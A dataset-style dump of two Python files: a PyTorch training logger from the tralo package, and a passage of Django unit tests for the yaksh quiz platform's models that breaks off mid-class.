source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
training_tracker.py
|
import copy
import gzip
import json
import os
import time
from collections import defaultdict
from os.path import isdir, join, dirname, realpath
import threading
import numpy as np
import torch
from torch import nn
from tralo.log import log
import multiprocessing as mp
from tralo.utils import count_parameters, sha1_hash_object, gzip_write
def compute_metrics(base_path, iteration, metric_values, metric_lock, manager, callback, best_score, model):
""" defined as function to support multiprocessing """
output = callback(model)
metrics_str = ' '.join([f'{k}: {v:.5f}' for k, v in output if k not in {'iterations'}])
log.info(f'{iteration}: {metrics_str}')
if output[0][1] > best_score.value:
best_score.value = output[0][1]
weight_file = join(base_path, f'weights.pth') if base_path is not None else None
if weight_file is not None:
torch.save(model.state_dict(), weight_file)
if iteration not in metric_values:
metric_values[iteration] = manager.dict()
metric_values[iteration].update({k: v for k, v in output})
metric_file = join(base_path, f'metrics.json') if base_path is not None else None
if metric_file is not None:
metric_lock.acquire()
with open(metric_file, 'w') as fh:
json.dump({k: v.copy() for k, v in metric_values.items()}, fh)
metric_lock.release()
def plot_losses(filename, iterations, losses):
""" defined as function to support multiprocessing """
import matplotlib.pyplot as plt
plt.plot(iterations, losses)
plt.savefig(filename)
plt.clf()
class LogUtilization(mp.Process):
def __init__(self, log_file=None, stats=None, interval=0.1, write_interval=10):
mp.Process.__init__(self)
self.log_file = log_file
self.stats = stats
self.interval = interval
# by using mp.Value we allow this variable to be manipulated from outside
self.step_interval = mp.Value("i", int(write_interval / interval))
self.p = None
self.exit = mp.Event()
stats = dict(cpu=[], gpu=[], mem=[], gpu_mem=[], time=[])
if self.stats is None:
self.stats = stats
else:
self.stats.update(**stats)
def run(self):
try:
try:
import pynvml
pynvml.nvmlInit()
dev_id = 0
if 'CUDA_VISIBLE_DEVICES' in os.environ:
if ',' in os.environ['CUDA_VISIBLE_DEVICES']:
raise ValueError('Currently utility tracking is only supported for single devices')
else:
dev_id = int(os.environ['CUDA_VISIBLE_DEVICES'])
gpu_handle = pynvml.nvmlDeviceGetHandleByIndex(dev_id)
except (ImportError, ValueError):
gpu_handle = None
log.warning('Install pynvml to use GPU utilization logging.')
i = 0
t_start = time.time()
while not self.exit.is_set():
time.sleep(self.interval)
self.stats['time'] += [int((time.time() - t_start)*1000)]
try:
import psutil
except ImportError:
psutil = None
if psutil is not None:
self.stats['cpu'] += [psutil.cpu_percent()]
self.stats['mem'] += [psutil.virtual_memory().used]
if gpu_handle is not None:
self.stats['gpu'] += [pynvml.nvmlDeviceGetUtilizationRates(gpu_handle).gpu]
self.stats['gpu_mem'] += [pynvml.nvmlDeviceGetMemoryInfo(gpu_handle).used]
# if a log file is used
if self.log_file is not None and i % self.step_interval.value == (self.step_interval.value - 1):
if self.p is not None:
self.p.join()
self.p = threading.Thread(target=gzip_write, args=(self.log_file, dict(self.stats)))
self.p.start()
i += 1
except KeyboardInterrupt:
self.shutdown()
def shutdown(self):
# self.write()
if self.p is not None:
self.p.join()
self.exit.set()
class TrainingLogger(object):
def __init__(self, log_dir=None, interval=50, model=None, config=None,
metric=None, async_metric=None, grad_weights=None, grad_interval=None,
plot=False, utilization_iters=200, checkpoint_iters=None):
"""
Training logger class.
log_dir: Folder to save logs and weights.
interval: Log interval.
model: Reference to model (optional).
config: Current training configuration.
metric: Tuple of metric function and evaluation interval. The function takes model
as an argument.
grad_weights: A list of layers from which you want to obtain gradients
async_metric: Must be a tuple (callback, interval). Callback must return a list of tuples (metric_name, score). The
first tuple of this list will be used for defining the best weights.
Larger scores are considered better.
plot Write training plots.
utilization_iters: Number of iterations during which utilization (CPU and GPU) is tracked.
checkpoint_iters: List of iterations at which the weights are saved.
"""
# these values can be changed by attribute access, although this should not be necessary in most cases
self.estimate_duration_iter = 10 # estimate training speed over 10 iterations
self.fixed_iterations = set([2, 5, 10])
self.save_only_trainable_weights = False
self.model = model
self.model_params = {n: m for n, m in self.model.named_parameters()} if self.model is not None else {}
self.plot = plot
self.interval = interval
self.checkpoint_iters = checkpoint_iters
self.grad_interval = interval if grad_interval is None else grad_interval
assert grad_weights is None or self.grad_interval is not None
self.mp_manager = mp.Manager()
if log_dir is None and config is not None:
log_dir = sha1_hash_object(config)[:10]
self.stats = dict(start_time=int(time.time()))
self.base_path = join(f'logs/{log_dir}') if log_dir is not None else None
if self.base_path is not None:
os.makedirs(self.base_path, exist_ok=True)
os.makedirs(join(self.base_path, 'gradients'), exist_ok=True)
if config is not None:
json.dump(config, open(join(self.base_path, 'config.json'), 'w'))
with open(join(self.base_path, 'stats.json'), 'w') as fh:
json.dump(self.stats, fh)
# utilization tracking
if utilization_iters > 0:
self.utilization_iters = utilization_iters
if self.base_path is not None:
self.utilization_process = LogUtilization(log_file=join(self.base_path, 'utilization.json.gz'))
else:
self.utilization_stats = self.mp_manager.dict()
self.utilization_process = LogUtilization(stats=self.utilization_stats)
self.utilization_process.start()
else:
self.utilization_process = None
# gradient tracking
if grad_weights is not None:
grad_weights = grad_weights if type(grad_weights) in {list, tuple} else list(grad_weights)
self.grad_weights = []
self.grad_names = []
for gw in grad_weights:
# if is pair and first element is string assume its the name
if type(gw) in {list, tuple} and len(gw) == 2 and type(gw[0]) == str:
name = gw[0]
gw = gw[1]
else:
name = 'grad'
# for convenience: transform modules into weights
if isinstance(gw, nn.Module):
if isinstance(gw, (nn.Linear, nn.Conv1d, nn.Conv2d, nn.Conv3d)):
self.grad_weights += [gw.weight, gw.bias]
self.grad_names += [name + '_weight', name + '_bias']
else:
raise ValueError('invalid module type. Provide weights instead.')
elif isinstance(gw, torch.Tensor):
self.grad_weights += [gw]
self.grad_names += [name]
self.gradients = [[] for _ in range(len(self.grad_weights))]
self.gradient_iterations = []
else:
self.grad_weights = None
self.gradients = None
# metrics
self.metric_values = self.mp_manager.dict()
self.metrics_lock = torch.multiprocessing.Lock() # avoid writing from two processes
if metric is not None:
self.metric_callback = metric[0]
self.metric_interval = metric[1]
else:
self.metric_interval = None
if async_metric is not None:
self.async_metric_callback = async_metric[0]
self.async_metric_interval = async_metric[1]
else:
self.async_metric_interval = None
# self.metric_callback_async = metric_callback_async
self.loss_iterations = []
self.losses = []
self.loss_cache = []
self.best_score = self.mp_manager.Value(float, -999)
self.plot_thread = None
self.running_processes = []
self.max_processes = 3
self.time_at_2 = None # tracks time at iteration 2
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
""" automatically stop processes if used in a context manager """
if self.utilization_process is not None:
self.utilization_process.terminate()
self.update_stats()
for p in self.running_processes:
p.join()
def stop(self):
""" explicit stop function """
self.__exit__(None, None, None)
def save_weights(self, only_trainable=False, weight_file='weights.pth'):
""" convenience function to save weights """
if self.model is None:
raise AttributeError('You need to provide a model reference when initializing TrainingTracker to save weights.')
weights_path = join(self.base_path, weight_file)
weight_dict = self.model.state_dict()
if only_trainable:
weight_dict = {n: weight_dict[n] for n, p in self.model.named_parameters() if p.requires_grad}
torch.save(weight_dict, weights_path)
log.info(f'Saved weights to {weights_path}')
def update_stats(self):
self.stats['stop_time'] = int(time.time())
self.stats['iterations'] = int(self.loss_iterations[-1]) if len(self.loss_iterations) > 0 else 0
if self.model:
self.stats['params'] = int(count_parameters(self.model))
self.stats['learn_params'] = int(count_parameters(self.model, only_trainable=True))
try:
with gzip.open(join(self.base_path, 'utilization.json.gz'), 'rb') as fh:
util = json.loads(fh.read())
self.stats['cpu_mean'] = int(np.mean(util['cpu']))
self.stats['gpu_mean'] = int(np.mean(util['gpu']))
self.stats['mem_mean'] = int(np.mean(util['mem']))
self.stats['gpu_mem_mean'] = int(np.mean(util['gpu_mem']))
except BaseException:
pass
if self.base_path is not None:
with open(join(self.base_path, 'stats.json'), 'w') as fh:
json.dump(self.stats, fh)
def launch_async_metric(self, i):
# metrics_path = join(self.base_path, f'metrics.json') if self.base_path is not None else None
if len([1 for p in self.running_processes if p.is_alive()]) > self.max_processes:
log.info('Too many background processes. joining...')
for p in self.running_processes:
p.join()
from torch.multiprocessing import Process
model_copy = copy.deepcopy(self.model).cpu() if self.model is not None else None
p = Process(target=compute_metrics, args=(self.base_path, i, self.metric_values, self.metrics_lock, self.mp_manager,
self.async_metric_callback, self.best_score, model_copy))
p.start()
self.running_processes += [p]
def save_metrics(self, i, **metrics):
if len(metrics) > 0:
this_dict = self.mp_manager.dict()
for metric_name, value in metrics.items():
if callable(value):
value = value()
this_dict[metric_name] = value
if i not in self.metric_values:
self.metric_values[i] = this_dict
else:
self.metric_values[i].update(this_dict)
if self.base_path is not None:
self.metrics_lock.acquire()
with open(join(self.base_path, f'metrics.json'), 'w') as fh:
json.dump({k: v.copy() for k, v in self.metric_values.items()}, fh)
self.metrics_lock.release()
def __call__(self, i, loss=None, **extras):
self.iter(i, loss=loss, **extras)
def iter(self, i, loss=None, **extras):
if self.utilization_process is not None and i >= self.utilization_iters:
log.info('stop utility logging process')
self.utilization_process.terminate()
self.utilization_process = None
if i == 2:
self.time_at_2 = time.time()
if i == 2 + self.estimate_duration_iter:
time_diff = time.time() - self.time_at_2
time_per_iter = time_diff / self.estimate_duration_iter
log.info(f'Speed estimates: {time_per_iter:.3f}s/iter or {time_per_iter*1000/60:.1f}min/1000 iter')
if i % self.grad_interval == self.grad_interval -1:
if self.grad_weights is not None:
for j, (w, name) in enumerate(zip(self.grad_weights, self.grad_names)):
hist = torch.histc(w.grad.cpu(), bins=500)
if self.base_path is not None:
name = name if name is not None else 'grad'
torch.save(hist, join(self.base_path, f'gradients/{i:08d}-{j}-{name}.pth'))
else:
self.gradients[j] += [hist]
self.gradient_iterations += [i]
if self.checkpoint_iters is not None and i in self.checkpoint_iters:
self.save_weights(only_trainable=self.save_only_trainable_weights,
weight_file='weights_{i}.pth')
# normal metrics
if self.metric_interval is not None and i % self.metric_interval == self.metric_interval - 1:
compute_metrics(self.base_path, i, self.metric_values, self.metrics_lock, self.mp_manager, self.metric_callback, self.best_score, self.model)
# async metrics
if self.async_metric_interval is not None and i % self.async_metric_interval == self.async_metric_interval - 1:
self.launch_async_metric(i)
# add extras passed via arguments
loss_str, metrics_str = '', ''
if len(extras) > 0:
self.save_metrics(i, **extras)
if len(self.metric_values) > 0:
metrics_str = ' '.join([f'{k}: {v:.5f}' for k, v in self.metric_values[i].items() if k not in {'iterations'}])
# log.info(f'{i}:{metrics_str}')
if i % self.interval == self.interval - 1 or i in self.fixed_iterations:
if loss is not None:
self.loss_cache += [float(loss)]
current_loss = np.mean(self.loss_cache)
self.loss_cache = []
self.losses += [current_loss]
self.loss_iterations += [i]
if self.base_path is not None:
json.dump({'loss': self.losses, 'iterations': self.loss_iterations},
open(join(self.base_path, 'losses.json'), 'w'))
if self.plot and self.base_path is not None:
self.plot_thread = threading.Thread(target=plot_losses, args=(join(self.base_path + '-loss.pdf'),
self.loss_iterations, self.losses))
if loss is not None:
loss_str = f' loss: {current_loss:.5f}'
log.info(f'{i}:{loss_str} {metrics_str}')
def plots(self):
from tralo.visualize import show_run
gradients = (self.grad_names, self.grad_weights, self.gradient_iterations, self.gradients) if self.gradients is not None else None
if self.base_path is not None:
with gzip.open(join(self.base_path, 'utilization.json.gz'), 'rb') as fh:
util_stats = json.loads(fh.read())
elif hasattr(self, 'utilization_stats'):
util_stats = self.utilization_stats
else:
util_stats = None
show_run(self.base_path, self.metric_values, (self.loss_iterations, self.losses),
gradients, util_stats)
# backward compatibility
TrainingTracker = TrainingLogger
|
test_models.py
|
import unittest
from yaksh.models import User, Profile, Question, Quiz, QuestionPaper,\
QuestionSet, AnswerPaper, Answer, Course, StandardTestCase,\
StdIOBasedTestCase, FileUpload, McqTestCase, AssignmentUpload,\
LearningModule, LearningUnit, Lesson, LessonFile, CourseStatus
from yaksh.code_server import(ServerPool,
get_result as get_result_from_code_server
)
import json
import ruamel.yaml as yaml
from datetime import datetime, timedelta
from django.utils import timezone
import pytz
from django.contrib.auth.models import Group
from django.db import IntegrityError
from django.core.files import File
from django.forms.models import model_to_dict
from textwrap import dedent
import zipfile
import os
import shutil
import tempfile
from threading import Thread
from yaksh import settings
def setUpModule():
# create user profile
user = User.objects.create_user(username='creator',
password='demo',
email='demo@test.com')
User.objects.create_user(username='demo_user2',
password='demo',
email='demo@test.com')
Profile.objects.create(user=user, roll_number=1, institute='IIT',
department='Chemical', position='Student')
student = User.objects.create_user(username='demo_user3',
password='demo',
email='demo3@test.com')
Profile.objects.create(user=student, roll_number=3, institute='IIT',
department='Chemical', position='Student')
user4 = User.objects.create_user(username='demo_user4',
password='demo',
email='demo4@test.com'
)
Profile.objects.create(user=user4, roll_number=4, institute='IIT',
department='Chemical', position='Student')
# create a course
course = Course.objects.create(name="Python Course",
enrollment="Enroll Request", creator=user)
# create 20 questions
for i in range(1, 21):
Question.objects.create(summary='Q%d' % (i), points=1, type='code', user=user)
# create a quiz
quiz = Quiz.objects.create(start_date_time=datetime(2015, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc),
end_date_time=datetime(2199, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc),
duration=30, active=True,
attempts_allowed=1, time_between_attempts=0,
description='demo quiz 1', pass_criteria=0,
instructions="Demo Instructions")
Quiz.objects.create(start_date_time=datetime(2014, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc),
end_date_time=datetime(2015, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc),
duration=30, active=False,
attempts_allowed=-1, time_between_attempts=0,
description='demo quiz 2', pass_criteria=40,
instructions="Demo Instructions")
tmp_file1 = os.path.join(tempfile.gettempdir(), "test.txt")
with open(tmp_file1, 'wb') as f:
f.write('2'.encode('ascii'))
# Learing module
learning_module_one = LearningModule.objects.create(name='LM1',
description='module one',
creator=user)
learning_module_two = LearningModule.objects.create(name='LM2',
description='module two',
creator=user,
order=1)
lesson = Lesson.objects.create(name='L1', description='Video Lesson',
creator=user)
learning_unit_lesson = LearningUnit.objects.create(order=1, lesson=lesson,
type='lesson')
learning_unit_quiz = LearningUnit.objects.create(order=2, quiz=quiz,
type='quiz')
learning_module_one.learning_unit.add(learning_unit_lesson)
learning_module_one.learning_unit.add(learning_unit_quiz)
learning_module_one.save()
course.learning_module.add(learning_module_one)
course.learning_module.add(learning_module_two)
course_user = User.objects.create(username='course_user')
course.students.add(course_user)
course.save()
LessonFile.objects.create(lesson=lesson)
CourseStatus.objects.create(course=course, user=course_user)
def tearDownModule():
User.objects.all().delete()
Question.objects.all().delete()
Quiz.objects.all().delete()
Course.objects.all().delete()
QuestionPaper.objects.all().delete()
LessonFile.objects.all().delete()
Lesson.objects.all().delete()
LearningUnit.objects.all().delete()
LearningModule.objects.all().delete()
AnswerPaper.objects.all().delete()
###############################################################################
class LessonTestCases(unittest.TestCase):
def setUp(self):
self.lesson = Lesson.objects.get(name='L1')
self.creator = User.objects.get(username='creator')
def test_lesson(self):
self.assertEqual(self.lesson.name, 'L1')
self.assertEqual(self.lesson.description, 'Video Lesson')
self.assertEqual(self.lesson.creator.username, self.creator.username)
class LearningModuleTestCases(unittest.TestCase):
def setUp(self):
self.learning_module = LearningModule.objects.get(name='LM1')
self.learning_module_two = LearningModule.objects.get(name='LM2')
self.creator = User.objects.get(username='creator')
self.student = User.objects.get(username='course_user')
self.learning_unit_one = LearningUnit.objects.get(order=1)
self.learning_unit_two = LearningUnit.objects.get(order=2)
self.quiz = Quiz.objects.get(description='demo quiz 1')
self.lesson = Lesson.objects.get(name='L1')
self.course = Course.objects.get(name='Python Course')
self.course_status = CourseStatus.objects.get(
course=self.course, user=self.student)
def tearDown(self):
# Remove unit from course status completed units
self.course_status.completed_units.remove(self.learning_unit_one)
self.course_status.completed_units.remove(self.learning_unit_two)
def test_learning_module(self):
self.assertEqual(self.learning_module.description, 'module one')
self.assertEqual(self.learning_module.creator, self.creator)
self.assertTrue(self.learning_module.check_prerequisite)
self.assertEqual(self.learning_module.order, 0)
def test_get_quiz_units(self):
# Given
quizzes = [self.quiz]
# When
module_quizzes = self.learning_module.get_quiz_units()
# Then
self.assertSequenceEqual(module_quizzes, quizzes)
def test_get_learning_units(self):
# Given
learning_units = [self.learning_unit_one, self.learning_unit_two]
# When
module_units = self.learning_module.get_learning_units()
# Then
self.assertSequenceEqual(module_units, learning_units)
def test_get_added_quiz_lesson(self):
# Given
quiz_lessons = [('lesson', self.lesson), ('quiz', self.quiz)]
# When
module_quiz_lesson = self.learning_module.get_added_quiz_lesson()
# Then
self.assertEqual(module_quiz_lesson, quiz_lessons)
def test_toggle_check_prerequisite(self):
self.assertTrue(self.learning_module.check_prerequisite)
# When
self.learning_module.toggle_check_prerequisite()
# Then
self.assertFalse(self.learning_module.check_prerequisite)
# When
self.learning_module.toggle_check_prerequisite()
# Then
self.assertTrue(self.learning_module.check_prerequisite)
def test_get_next_unit(self):
# Given
current_unit_id = self.learning_unit_one.id
next_unit = self.learning_unit_two
# When
unit = self.learning_module.get_next_unit(current_unit_id)
# Then
self.assertEqual(unit, next_unit)
# Given
current_unit_id = self.learning_unit_two.id
next_unit = self.learning_unit_one
# When
unit = self.learning_module.get_next_unit(current_unit_id)
# Then
self.assertEqual(unit, next_unit)
def test_get_module_status(self):
# Given
module_status = 'not attempted'
# When
status = self.learning_module.get_status(self.student, self.course)
# Then
self.assertEqual(status, module_status)
# Module in progress
# Given
self.course_status.completed_units.add(self.learning_unit_one)
# When
status = self.learning_module.get_status(self.student, self.course)
# Then
self.assertEqual("inprogress", status)
# Module is completed
# Given
self.course_status.completed_units.add(self.learning_unit_two)
# When
status = self.learning_module.get_status(self.student, self.course)
# Then
self.assertEqual("completed", status)
# Module with no units
self.course.learning_module.add(self.learning_module_two)
status = self.learning_module_two.get_status(self.student, self.course)
self.assertEqual("no units", status)
def test_module_completion_percent(self):
# for module without learning units
percent = self.learning_module_two.get_module_complete_percent(
self.course, self.student
)
self.assertEqual(percent, 0)
# for module with learning units
self.course_status.completed_units.add(self.learning_unit_one)
self.course_status.completed_units.add(self.learning_unit_two)
percent = self.learning_module.get_module_complete_percent(
self.course, self.student
)
self.assertEqual(percent, 100)
class LearningUnitTestCases(unittest.TestCase):
def setUp(self):
learning_module = LearningModule.objects.get(name='LM1')
self.learning_unit_one = learning_module.learning_unit.get(order=1)
self.learning_unit_two = learning_module.learning_unit.get(order=2)
self.lesson = Lesson.objects.get(name='L1')
self.quiz = Quiz.objects.get(description='demo quiz 1')
def test_learning_unit(self):
self.assertEqual(self.learning_unit_one.type, 'lesson')
self.assertEqual(self.learning_unit_two.type, 'quiz')
self.assertEqual(self.learning_unit_one.lesson, self.lesson)
self.assertEqual(self.learning_unit_two.quiz, self.quiz)
self.assertIsNone(self.learning_unit_one.quiz)
self.assertIsNone(self.learning_unit_two.lesson)
self.assertTrue(self.learning_unit_one.check_prerequisite)
self.assertTrue(self.learning_unit_two.check_prerequisite)
class ProfileTestCases(unittest.TestCase):
def setUp(self):
self.user1 = User.objects.get(username='creator')
self.profile = Profile.objects.get(user=self.user1)
self.user2 = User.objects.get(username='demo_user3')
def test_user_profile(self):
""" Test user profile"""
self.assertEqual(self.user1.username, 'creator')
self.assertEqual(self.profile.user.username, 'creator')
self.assertEqual(int(self.profile.roll_number), 1)
self.assertEqual(self.profile.institute, 'IIT')
self.assertEqual(self.profile.department, 'Chemical')
self.assertEqual(self.profile.position, 'Student')
###############################################################################
class QuestionTestCases(unittest.TestCase):
def setUp(self):
# Single question details
self.user1 = User.objects.get(username="creator")
self.user2 = User.objects.get(username="demo_user2")
self.question1 = Question.objects.create(summary='Demo Python 1',
language='Python',
type='Code',
active=True,
description='Write a function',
points=1.0,
snippet='def myfunc()',
user=self.user1
)
self.question2 = Question.objects.create(summary='Yaml Json',
language='python',
type='code',
active=True,
description='factorial of a no',
points=2.0,
snippet='def fact()',
user=self.user2
)
# create a temp directory and add files for loading questions test
file_path = os.path.join(tempfile.gettempdir(), "test.txt")
self.load_tmp_path = tempfile.mkdtemp()
shutil.copy(file_path, self.load_tmp_path)
file1 = os.path.join(self.load_tmp_path, "test.txt")
# create a temp directory and add files for dumping questions test
self.dump_tmp_path = tempfile.mkdtemp()
shutil.copy(file_path, self.dump_tmp_path)
file2 = os.path.join(self.dump_tmp_path, "test.txt")
upload_file = open(file2, "r")
django_file = File(upload_file)
file = FileUpload.objects.create(file=django_file,
question=self.question2
)
self.question1.tags.add('python', 'function')
self.assertion_testcase = StandardTestCase(question=self.question1,
test_case='assert myfunc(12, 13) == 15',
type='standardtestcase'
)
self.upload_test_case = StandardTestCase(question=self.question2,
test_case='assert fact(3) == 6',
type='standardtestcase'
)
self.upload_test_case.save()
self.user_answer = "demo_answer"
self.test_case_upload_data = [{"test_case": "assert fact(3)==6",
"test_case_type": "standardtestcase",
"test_case_args": "",
"weight": 1.0
}]
questions_data = [{"snippet": "def fact()", "active": True,
"points": 1.0,
"description": "factorial of a no",
"language": "Python", "type": "Code",
"testcase": self.test_case_upload_data,
"files": [[file1, 0]],
"summary": "Yaml Demo",
"tags": ['yaml_demo']
}]
questions_data_with_missing_fields = [{"active": True,
"points": 1.0,
"description":\
"factorial of a no",
"language": "Python",
"type": "Code",
"testcase":\
self.test_case_upload_data,
"summary": "Yaml Demo 2"
}]
self.yaml_questions_data = yaml.safe_dump_all(questions_data)
self.yaml_questions_data_with_missing_fields = yaml.safe_dump_all(
questions_data_with_missing_fields
)
def tearDown(self):
shutil.rmtree(self.load_tmp_path)
shutil.rmtree(self.dump_tmp_path)
uploaded_files = FileUpload.objects.all()
que_id_list = [file.question.id for file in uploaded_files]
for que_id in que_id_list:
dir_path = os.path.join(os.getcwd(), "yaksh", "data",
"question_{0}".format(que_id)
)
if os.path.exists(dir_path):
shutil.rmtree(dir_path)
uploaded_files.delete()
def test_question(self):
""" Test question """
self.assertEqual(self.question1.summary, 'Demo Python 1')
self.assertEqual(self.question1.language, 'Python')
self.assertEqual(self.question1.type, 'Code')
self.assertEqual(self.question1.description, 'Write a function')
self.assertEqual(self.question1.points, 1.0)
self.assertTrue(self.question1.active)
self.assertEqual(self.question1.snippet, 'def myfunc()')
tag_list = []
for tag in self.question1.tags.all():
tag_list.append(tag.name)
for tag in tag_list:
self.assertIn(tag, ['python', 'function'])
def test_dump_questions(self):
""" Test dump questions into Yaml """
question = Question()
question_id = [self.question2.id]
questions_zip = question.dump_questions(question_id, self.user2)
que_file = FileUpload.objects.get(question=self.question2.id)
zip_file = zipfile.ZipFile(questions_zip, "r")
tmp_path = tempfile.mkdtemp()
zip_file.extractall(tmp_path)
test_case = self.question2.get_test_cases()
with open("{0}/questions_dump.yaml".format(tmp_path), "r") as f:
questions = yaml.safe_load_all(f.read())
for q in questions:
self.assertEqual(self.question2.summary, q['summary'])
self.assertEqual(self.question2.language, q['language'])
self.assertEqual(self.question2.type, q['type'])
self.assertEqual(self.question2.description, q['description'])
self.assertEqual(self.question2.points, q['points'])
self.assertTrue(self.question2.active)
self.assertEqual(self.question2.snippet, q['snippet'])
self.assertEqual(os.path.basename(que_file.file.path),
q['files'][0][0])
self.assertEqual([case.get_field_value() for case in test_case],
q['testcase']
)
for file in zip_file.namelist():
os.remove(os.path.join(tmp_path, file))
def test_load_questions_with_all_fields(self):
""" Test load questions into database from Yaml """
question = Question()
result = question.load_questions(self.yaml_questions_data, self.user1)
question_data = Question.objects.get(summary="Yaml Demo")
file = FileUpload.objects.get(question=question_data)
test_case = question_data.get_test_cases()
self.assertEqual(question_data.summary, 'Yaml Demo')
self.assertEqual(question_data.language, 'Python')
self.assertEqual(question_data.type, 'Code')
self.assertEqual(question_data.description, 'factorial of a no')
self.assertEqual(question_data.points, 1.0)
self.assertTrue(question_data.active)
tags = question_data.tags.all().values_list("name",flat=True)
self.assertListEqual(list(tags), ['yaml_demo'])
self.assertEqual(question_data.snippet, 'def fact()')
self.assertEqual(os.path.basename(file.file.path), "test.txt")
self.assertEqual([case.get_field_value() for case in test_case],
self.test_case_upload_data
)
def test_load_questions_with_missing_fields(self):
""" Test load questions into database from Yaml with
missing fields like files, snippet and tags. """
question = Question()
result = question.load_questions(
self.yaml_questions_data_with_missing_fields,
self.user1
)
question_data = Question.objects.get(summary="Yaml Demo 2")
file = FileUpload.objects.filter(question=question_data)
test_case = question_data.get_test_cases()
self.assertEqual(question_data.summary,'Yaml Demo 2')
self.assertEqual(question_data.language,'Python')
self.assertEqual(question_data.type, 'Code')
self.assertEqual(question_data.description,'factorial of a no')
self.assertEqual(question_data.points, 1.0)
self.assertTrue(question_data.active)
self.assertEqual(question_data.snippet,'')
self.assertListEqual(list(file),[])
self.assertEqual([case.get_field_value() for case in test_case],
self.test_case_upload_data
)
tags = question_data.tags.all().values_list("name",flat=True)
self.assertListEqual(list(tags), [])
###############################################################################
class QuizTestCases(unittest.TestCase):
def setUp(self):
self.course = Course.objects.get(name="Python Course")
self.creator = User.objects.get(username="creator")
self.teacher = User.objects.get(username="demo_user2")
self.student1 = User.objects.get(username='demo_user3')
self.student2 = User.objects.get(username='demo_user4')
self.quiz1 = Quiz.objects.get(description='demo quiz 1')
self.quiz2 = Quiz.objects.get(description='demo quiz 2')
self.quiz3 = Quiz.objects.create(
start_date_time=datetime(2015, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
end_date_time=datetime(2199, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
duration=30, active=True,
attempts_allowed=1, time_between_attempts=0,
description='demo quiz 3', pass_criteria=0,
instructions="Demo Instructions"
)
self.question_paper3 = QuestionPaper.objects.create(quiz=self.quiz3)
self.quiz4 = Quiz.objects.create(
start_date_time=datetime(2015, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
end_date_time=datetime(2199, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
duration=30, active=True,
attempts_allowed=1, time_between_attempts=0,
description='demo quiz 4', pass_criteria=0,
instructions="Demo Instructions"
)
self.answerpaper1 = AnswerPaper.objects.create(
user=self.student1,
question_paper=self.question_paper3,
course=self.course,
attempt_number=1,
start_time=datetime(2015, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
end_time=datetime(2015, 10, 9, 10, 28, 15, 0, tzinfo=pytz.utc),
passed=True
)
self.answerpaper2 = AnswerPaper.objects.create(
user=self.student2,
question_paper=self.question_paper3,
course=self.course,
attempt_number=1,
start_time=datetime(2015, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
end_time=datetime(2015, 10, 9, 10, 28, 15, 0, tzinfo=pytz.utc),
passed=False
)
self.trial_course = Course.objects.create_trial_course(self.creator)
def tearDown(self):
self.answerpaper1.delete()
self.answerpaper2.delete()
self.trial_course.delete()
self.quiz3.delete()
self.quiz4.delete()
self.question_paper3.delete()
def test_get_total_students(self):
self.assertEqual(self.quiz3.get_total_students(self.course), 2)
def test_get_total_students_without_questionpaper(self):
self.assertEqual(self.quiz4.get_total_students(self.course), 0)
def test_get_passed_students(self):
self.assertEqual(self.quiz3.get_passed_students(self.course), 1)
def test_get_passed_students_without_questionpaper(self):
self.assertEqual(self.quiz4.get_passed_students(self.course), 0)
def test_get_failed_students(self):
self.assertEqual(self.quiz3.get_failed_students(self.course), 1)
def test_get_failed_students_without_questionpaper(self):
self.assertEqual(self.quiz4.get_failed_students(self.course), 0)
def test_quiz(self):
""" Test Quiz"""
self.assertEqual((self.quiz1.start_date_time).strftime('%Y-%m-%d'),
'2015-10-09')
self.assertEqual((self.quiz1.start_date_time).strftime('%H:%M:%S'),
'10:08:15')
self.assertEqual(self.quiz1.duration, 30)
self.assertTrue(self.quiz1.active)
self.assertEqual(self.quiz1.description, 'demo quiz 1')
self.assertEqual(self.quiz1.pass_criteria, 0)
self.assertEqual(self.quiz1.instructions, "Demo Instructions")
def test_is_expired(self):
self.assertFalse(self.quiz1.is_expired())
self.assertTrue(self.quiz2.is_expired())
def test_get_active_quizzes(self):
quizzes = Quiz.objects.get_active_quizzes()
for quiz in quizzes:
self.assertTrue(quiz.active)
def test_create_trial_quiz(self):
"""Test to check if trial quiz is created"""
trial_quiz = Quiz.objects.create_trial_quiz(self.creator)
self.assertEqual(trial_quiz.duration, 1000)
self.assertEqual(trial_quiz.description, "trial_questions")
self.assertTrue(trial_quiz.is_trial)
self.assertEqual(trial_quiz.time_between_attempts, 0)
def test_create_trial_from_quiz_godmode(self):
"""Test to check if a copy of original quiz is created in godmode"""
trial_quiz = Quiz.objects.create_trial_from_quiz(self.quiz1.id,
self.creator,
True, self.course.id
)[0]
self.assertEqual(trial_quiz.description,
"Trial_orig_id_{}_godmode".format(self.quiz1.id)
)
self.assertTrue(trial_quiz.is_trial)
self.assertEqual(trial_quiz.duration, 1000)
self.assertTrue(trial_quiz.active)
self.assertEqual(trial_quiz.end_date_time,
datetime(2199, 1, 1, 0, 0, 0, 0, tzinfo=pytz.utc)
)
self.assertEqual(trial_quiz.time_between_attempts, 0)
def test_create_trial_from_quiz_usermode(self):
"""Test to check if a copy of original quiz is created in usermode"""
trial_quiz = Quiz.objects.create_trial_from_quiz(self.quiz2.id,
self.creator,
False, self.course.id
)[0]
self.assertEqual(trial_quiz.description,
"Trial_orig_id_{}_usermode".format(self.quiz2.id))
self.assertTrue(trial_quiz.is_trial)
self.assertEqual(trial_quiz.duration, self.quiz2.duration)
self.assertEqual(trial_quiz.active, self.quiz2.active)
self.assertEqual(trial_quiz.start_date_time,
self.quiz2.start_date_time
)
self.assertEqual(trial_quiz.end_date_time,
self.quiz2.end_date_time
)
self.assertEqual(trial_quiz.time_between_attempts, 0)
def test_view_answerpaper(self):
self.assertFalse(self.quiz1.view_answerpaper)
self.assertFalse(self.quiz2.view_answerpaper)
# When
self.quiz1.view_answerpaper = True
self.quiz1.save()
# Then
self.assertTrue(self.quiz1.view_answerpaper)
###############################################################################
class QuestionPaperTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
